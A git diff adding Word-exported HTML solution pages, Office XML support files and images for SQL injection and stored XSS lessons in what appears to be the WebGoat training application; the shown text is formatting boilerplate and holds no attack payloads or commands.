+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1537"
+ o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:276.75pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/SqlStringInjection_files/image003.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=369
+src="/WebGoat/lesson_solutions/SqlStringInjection_files/image006.jpg" v:shapes="Picture_x0020_1537"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>2</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Lesson 18 Completed<span style='font-family:
+"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<span style='font-size:12.0pt;font-family:"Times New Roman","serif";mso-fareast-font-family:
+"Times New Roman";mso-ansi-language:EN-US;mso-fareast-language:EN-US;
+mso-bidi-language:AR-SA'><br clear=all style='mso-special-character:line-break;
+page-break-before:always'>
+</span>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+</div>
+<table align='RIGHT' cellspacing='0' width='90%' border='0' cellpadding='0'>
+	<tr>
+		<td valign='MIDDLE' width='100%' align='RIGHT class=MsoNormal' style='font-family:"Arial","sans-serif"'>
+			Solution by Erwin Geirnaert 
+		</td>
+		<td valign='MIDDLE' align='RIGHT'><img hspace='0' vspace='0' border='0' alt='ZION SECURITY' src='images/logos/zionsecurity.gif'></td>
+	</tr>
+</table>
+
+</body>
+
+</html>
diff --git a/main/project/WebContent/lesson_solutions/SqlStringInjection_files/colorschememapping.xml b/main/project/WebContent/lesson_solutions/SqlStringInjection_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/SqlStringInjection_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/SqlStringInjection_files/filelist.xml b/main/project/WebContent/lesson_solutions/SqlStringInjection_files/filelist.xml
new file mode 100644
index 000000000..fd0a8d509
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/SqlStringInjection_files/filelist.xml
@@ -0,0 +1,10 @@
+<xml xmlns:o="urn:schemas-microsoft-com:office:office">
+ <o:MainFile HRef="../SqlStringInjection.html"/>
+ <o:File HRef="themedata.thmx"/>
+ <o:File HRef="colorschememapping.xml"/>
+ <o:File HRef="image001.png"/>
+ <o:File HRef="image005.jpg"/>
+ <o:File HRef="image003.png"/>
+ <o:File HRef="image006.jpg"/>
+ <o:File HRef="filelist.xml"/>
+</xml>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/SqlStringInjection_files/image001.png b/main/project/WebContent/lesson_solutions/SqlStringInjection_files/image001.png
new file mode 100644
index 000000000..030affe86
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/SqlStringInjection_files/image001.png differ
diff --git a/main/project/WebContent/lesson_solutions/SqlStringInjection_files/image003.png b/main/project/WebContent/lesson_solutions/SqlStringInjection_files/image003.png
new file mode 100644
index 000000000..83342678d
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/SqlStringInjection_files/image003.png differ
diff --git a/main/project/WebContent/lesson_solutions/SqlStringInjection_files/image005.jpg b/main/project/WebContent/lesson_solutions/SqlStringInjection_files/image005.jpg
new file mode 100644
index 000000000..4154afc6a
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/SqlStringInjection_files/image005.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/SqlStringInjection_files/image006.jpg b/main/project/WebContent/lesson_solutions/SqlStringInjection_files/image006.jpg
new file mode 100644
index 000000000..dbe7cb0ad
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/SqlStringInjection_files/image006.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/SqlStringInjection_files/themedata.thmx b/main/project/WebContent/lesson_solutions/SqlStringInjection_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/SqlStringInjection_files/themedata.thmx differ
diff --git a/main/project/WebContent/lesson_solutions/StoredXSS_files/colorschememapping.xml b/main/project/WebContent/lesson_solutions/StoredXSS_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/StoredXSS_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/StoredXSS_files/filelist.xml b/main/project/WebContent/lesson_solutions/StoredXSS_files/filelist.xml
new file mode 100644
index 000000000..a3cfc699b
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/StoredXSS_files/filelist.xml
@@ -0,0 +1,12 @@
+<xml xmlns:o="urn:schemas-microsoft-com:office:office">
+ <o:MainFile HRef="../StoredXSS.html"/>
+ <o:File HRef="themedata.thmx"/>
+ <o:File HRef="colorschememapping.xml"/>
+ <o:File HRef="image001.png"/>
+ <o:File HRef="image007.jpg"/>
+ <o:File HRef="image003.png"/>
+ <o:File HRef="image008.jpg"/>
+ <o:File HRef="image005.png"/>
+ <o:File HRef="image009.jpg"/>
+ <o:File HRef="filelist.xml"/>
+</xml>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/StoredXSS_files/image001.png b/main/project/WebContent/lesson_solutions/StoredXSS_files/image001.png
new file mode 100644
index 000000000..1ad882b5f
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/StoredXSS_files/image001.png differ
diff --git a/main/project/WebContent/lesson_solutions/StoredXSS_files/image003.png b/main/project/WebContent/lesson_solutions/StoredXSS_files/image003.png
new file mode 100644
index 000000000..d44ec5c39
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/StoredXSS_files/image003.png differ
diff --git a/main/project/WebContent/lesson_solutions/StoredXSS_files/image005.png b/main/project/WebContent/lesson_solutions/StoredXSS_files/image005.png
new file mode 100644
index 000000000..5a5d10342
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/StoredXSS_files/image005.png differ
diff --git a/main/project/WebContent/lesson_solutions/StoredXSS_files/image007.jpg b/main/project/WebContent/lesson_solutions/StoredXSS_files/image007.jpg
new file mode 100644
index 000000000..ca84b8469
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/StoredXSS_files/image007.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/StoredXSS_files/image008.jpg b/main/project/WebContent/lesson_solutions/StoredXSS_files/image008.jpg
new file mode 100644
index 000000000..8ece60e0a
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/StoredXSS_files/image008.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/StoredXSS_files/image009.jpg b/main/project/WebContent/lesson_solutions/StoredXSS_files/image009.jpg
new file mode 100644
index 000000000..c0313ee42
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/StoredXSS_files/image009.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/StoredXSS_files/themedata.thmx b/main/project/WebContent/lesson_solutions/StoredXSS_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/StoredXSS_files/themedata.thmx differ
diff --git a/main/project/WebContent/lesson_solutions/StoredXss.html b/main/project/WebContent/lesson_solutions/StoredXss.html
new file mode 100644
index 000000000..78fc547b2
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/StoredXss.html
@@ -0,0 +1,705 @@
+<html xmlns:v="urn:schemas-microsoft-com:vml"
+xmlns:o="urn:schemas-microsoft-com:office:office"
+xmlns:w="urn:schemas-microsoft-com:office:word"
+xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
+xmlns="http://www.w3.org/TR/REC-html40">
+
+<head>
+<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
+<meta name=ProgId content=Word.Document>
+<meta name=Generator content="Microsoft Word 12">
+<meta name=Originator content="Microsoft Word 12">
+<link rel=File-List href="/WebGoat/lesson_solutions/StoredXSS_files/filelist.xml">
+<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/StoredXSS_files/editdata.mso">
+<!--[if !mso]>
+<style>
+v\:* {behavior:url(#default#VML);}
+o\:* {behavior:url(#default#VML);}
+w\:* {behavior:url(#default#VML);}
+.shape {behavior:url(#default#VML);}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:DocumentProperties>
+  <o:Author>egeirnaert</o:Author>
+  <o:LastAuthor>egeirnaert</o:LastAuthor>
+  <o:Revision>3</o:Revision>
+  <o:TotalTime>30</o:TotalTime>
+  <o:Created>2007-07-11T10:59:00Z</o:Created>
+  <o:LastSaved>2007-07-12T15:31:00Z</o:LastSaved>
+  <o:Pages>1</o:Pages>
+  <o:Words>138</o:Words>
+  <o:Characters>790</o:Characters>
+  <o:Company> </o:Company>
+  <o:Lines>6</o:Lines>
+  <o:Paragraphs>1</o:Paragraphs>
+  <o:CharactersWithSpaces>927</o:CharactersWithSpaces>
+  <o:Version>12.00</o:Version>
+ </o:DocumentProperties>
+</xml><![endif]-->
+<link rel=themeData href="/WebGoat/lesson_solutions/StoredXSS_files/themedata.thmx">
+<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/StoredXSS_files/colorschememapping.xml">
+<!--[if gte mso 9]><xml>
+ <w:WordDocument>
+  <w:TrackMoves>false</w:TrackMoves>
+  <w:TrackFormatting/>
+  <w:PunctuationKerning/>
+  <w:ValidateAgainstSchemas/>
+  <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
+  <w:IgnoreMixedContent>false</w:IgnoreMixedContent>
+  <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
+  <w:DoNotPromoteQF/>
+  <w:LidThemeOther>EN-US</w:LidThemeOther>
+  <w:LidThemeAsian>X-NONE</w:LidThemeAsian>
+  <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
+  <w:Compatibility>
+   <w:BreakWrappedTables/>
+   <w:SnapToGridInCell/>
+   <w:WrapTextWithPunct/>
+   <w:UseAsianBreakRules/>
+   <w:DontGrowAutofit/>
+   <w:SplitPgBreakAndParaMark/>
+   <w:DontVertAlignCellWithSp/>
+   <w:DontBreakConstrainedForcedTables/>
+   <w:DontVertAlignInTxbx/>
+   <w:Word11KerningPairs/>
+   <w:CachedColBalance/>
+  </w:Compatibility>
+  <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
+  <m:mathPr>
+   <m:mathFont m:val="Cambria Math"/>
+   <m:brkBin m:val="before"/>
+   <m:brkBinSub m:val="--"/>
+   <m:smallFrac m:val="off"/>
+   <m:dispDef/>
+   <m:lMargin m:val="0"/>
+   <m:rMargin m:val="0"/>
+   <m:defJc m:val="centerGroup"/>
+   <m:wrapIndent m:val="1440"/>
+   <m:intLim m:val="subSup"/>
+   <m:naryLim m:val="undOvr"/>
+  </m:mathPr></w:WordDocument>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
+  DefSemiHidden="true" DefQFormat="false" DefPriority="99"
+  LatentStyleCount="267">
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 1"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 2"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 3"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 4"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 5"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 6"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 7"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 8"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 9"/>
+  <w:LsdException Locked="false" Priority="0" QFormat="true" Name="caption"/>
+  <w:LsdException Locked="false" Priority="10" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Title"/>
+  <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
+  <w:LsdException Locked="false" Priority="11" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
+  <w:LsdException Locked="false" Priority="0" Name="Hyperlink"/>
+  <w:LsdException Locked="false" Priority="22" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
+  <w:LsdException Locked="false" Priority="20" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
+  <w:LsdException Locked="false" Priority="0" Name="Normal (Web)"/>
+  <w:LsdException Locked="false" Priority="59" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Table Grid"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
+  <w:LsdException Locked="false" Priority="1" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 1"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
+  <w:LsdException Locked="false" Priority="34" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
+  <w:LsdException Locked="false" Priority="29" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
+  <w:LsdException Locked="false" Priority="30" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 1"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 2"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 2"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 3"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 3"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 4"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 4"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 5"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 5"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 6"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 6"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="19" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
+  <w:LsdException Locked="false" Priority="21" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
+  <w:LsdException Locked="false" Priority="31" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
+  <w:LsdException Locked="false" Priority="32" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
+  <w:LsdException Locked="false" Priority="33" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
+  <w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
+  <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
+ </w:LatentStyles>
+</xml><![endif]-->
+<style>
+<!--
+ /* Font Definitions */
+ @font-face
+	{font-family:"MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-alt:"\FF2D\FF33 \660E\671D";
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+@font-face
+	{font-family:"Cambria Math";
+	panose-1:2 4 5 3 5 4 6 3 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:roman;
+	mso-font-pitch:variable;
+	mso-font-signature:-1610611985 1107304683 0 0 159 0;}
+@font-face
+	{font-family:Tahoma;
+	panose-1:2 11 6 4 3 5 4 4 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:swiss;
+	mso-font-pitch:variable;
+	mso-font-signature:1627400839 -2147483648 8 0 66047 0;}
+@font-face
+	{font-family:"\@MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+ /* Style Definitions */
+ p.MsoNormal, li.MsoNormal, div.MsoNormal
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	margin:0cm;
